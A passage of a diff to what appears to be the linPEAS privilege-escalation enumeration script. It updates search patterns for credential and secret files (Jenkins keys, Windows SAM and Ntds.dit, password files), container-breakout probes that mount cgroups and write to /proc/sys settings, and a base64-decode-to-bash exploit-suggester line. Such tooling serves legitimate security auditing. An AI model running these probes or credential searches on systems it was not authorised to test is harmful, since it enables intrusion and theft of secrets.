"^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_JENKINS=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_OPT\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_VAR\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E ".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/man/|/usr/|/var/cache/|/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_TMP\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_SRV\n$FIND_SBIN\n$FIND_MNT\n$FIND_OPT\n$FIND_BIN\n$FIND_HOMESEARCH\n$FIND_VAR\n$FIND_CONCOURSE_KEYS\n$FIND_LIB64\n$FIND_CDROM\n$FIND_CACHE\n$FIND_ETC\n$FIND_RUN\n$FIND_SYS\n$FIND_USR\n$FIND_LIB\n$FIND_LIB32\n$FIND_PRIVATE\n$FIND_CONCOURSE_AUTH\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}opt|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}private|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) - ##### POST SERACH VARIABLES ##### + ##### POST SEARCH VARIABLES ##### backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" printf ${YELLOW}"DONE\n"$NC echo "" @@ -1322,42 +1351,6 @@ else echo_not_found "sudo" fi echo "" -#-- SY) CVEs -print_2title "CVEs Check" - -#-- SY) CVE-2021-4034 -if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then - echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2021-3560 -polkitVersion=$(systemctl status polkit.service 2>/dev/null | grep version | cut -d " " -f 9) -if [ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 ] || [ "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1 ]; then - echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2022-0847 -#-- https://dirtypipe.cm4all.com/ -#-- https://stackoverflow.com/a/37939589 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17 - echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi - -#-- SY) CVE-2022-2588 -#-- https://github.com/Markakd/CVE-2022-2588 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19 - echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi -echo "" - #--SY) USBCreator if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then print_2title "USBCreator" @@ -1384,9 +1377,10 @@ print_2title "PATH" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses" if ! [ "$IAMROOT" ]; then echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" -else - echo "New path exported: $PATH" 2>/dev/null +fi + +if [ "$DEBUG" ]; then + echo "New path exported: $PATH" fi echo "" @@ -1463,7 +1457,7 @@ fi if [ "$(command -v bash 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester" print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="" + les_b64="" echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g" echo "" fi @@ -1497,6 +1491,14 @@ else echo_not_found "AppArmor" fi +#-- SY) AppArmor2 +print_list "AppArmor profile? .............. "$NC +(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN}," + +#-- SY) LinuxONE +print_list "is linuxONE? ................... "$NC +( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x") + #-- SY) grsecurity print_list "grsecurity present? ............ "$NC ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") @@ -1515,11 +1517,7 @@ print_list "SELinux enabled? ............... "$NC #-- SY) Seccomp print_list "Seccomp enabled? ............... "$NC -([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," - -#-- SY) AppArmor -print_list "AppArmor profile? .............. "$NC -(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," +([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) AppArmor print_list "User namespace? ................ "$NC @@ -1527,7 +1525,7 @@ if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,ena #-- SY) cgroup2 print_list "Cgroup2 enabled? ............... "$NC -([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) Gatekeeper if [ "$MACPEAS" ]; then @@ -1599,7 +1597,7 @@ containerCheck() { containerType="docker\n" fi - # Are we inside kubenetes? + # Are we inside kubernetes? if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || grep -qai kubepods /proc/self/cgroup 2>/dev/null; then @@ -1720,16 +1718,58 @@ checkContainerExploits() { fi } +checkCreateReleaseAgent(){ + cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys + do + if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then + release_agent_breakout2="Yes (unshare with $subsys)"; + rm -rf /tmp/cgroup_3628d4 + break + fi + done +} + checkProcSysBreakouts(){ - if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi + dev_mounted="No" + if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then + dev_mounted="Yes"; + fi + + proc_mounted="No" + if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then + proc_mounted="Yes"; + fi + + run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null) + if ! [ "$run_unshare" = "Yes" ]; then + run_unshare="No" + fi + + if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then + release_agent_breakout1="Yes" + else + release_agent_breakout1="No" + fi + release_agent_breakout2="No" mkdir /tmp/cgroup_3628d4 mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null - if [ $? -eq 0 ]; then release_agent_breakout2="Yes"; else release_agent_breakout2="No"; fi + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + checkCreateReleaseAgent + fi + fi rm -rf /tmp/cgroup_3628d4 2>/dev/null core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)" - modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)" + modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)" panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)" panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)" binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)" @@ -1759,7 +1799,7 @@ checkProcSysBreakouts(){ ############################################## containerCheck -print_2title "Container related tools present" +print_2title "Container related tools present (if any):" command -v docker command -v lxc command -v rkt @@ -1767,8 +1807,10 @@ command -v kubectl command -v podman command -v runc -print_2title "Am I Containered?" -execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED" +if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then + print_2title "Am I Containered?" + execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED" +fi print_2title "Container details" print_list "Is this a container? ...........$NC $containerType" @@ -1796,12 +1838,12 @@ else if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi -#If docker +# If docker if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC + print_list "Looking and enumerating Docker Sockets (if any):\n"$NC enumerateDockerSockets print_list "Docker version .................$NC$dockerVersion" checkDockerVersionExploits @@ -1809,7 +1851,7 @@ if echo "$containerType" | grep -qi "docker"; then print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [ "$inContainer" ]; then checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," echo "" fi if df -h | grep docker; then @@ -1818,10 +1860,10 @@ if echo "$containerType" | grep -qi "docker"; then fi fi -#If token secrets mounted +# If token secrets mounted if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then print_2title "Listing mounted tokens" - print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod" + print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod" ALREADY="IinItialVaaluE" for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) @@ -1841,8 +1883,8 @@ if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" - if echo "$containerType" | grep -qi "docker"; then + print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')" + if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi print_list "Seccomp enabled? ............... "$NC @@ -1852,7 +1894,7 @@ if [ "$inContainer" ]; then (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," print_list "User proc namespace? ........... "$NC - if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi + if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi checkContainerExploits print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -1861,33 +1903,35 @@ if [ "$inContainer" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts" checkProcSysBreakouts - print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED}," - print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED}," if [ "$EXTRA_CHECKS" ]; then - print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} 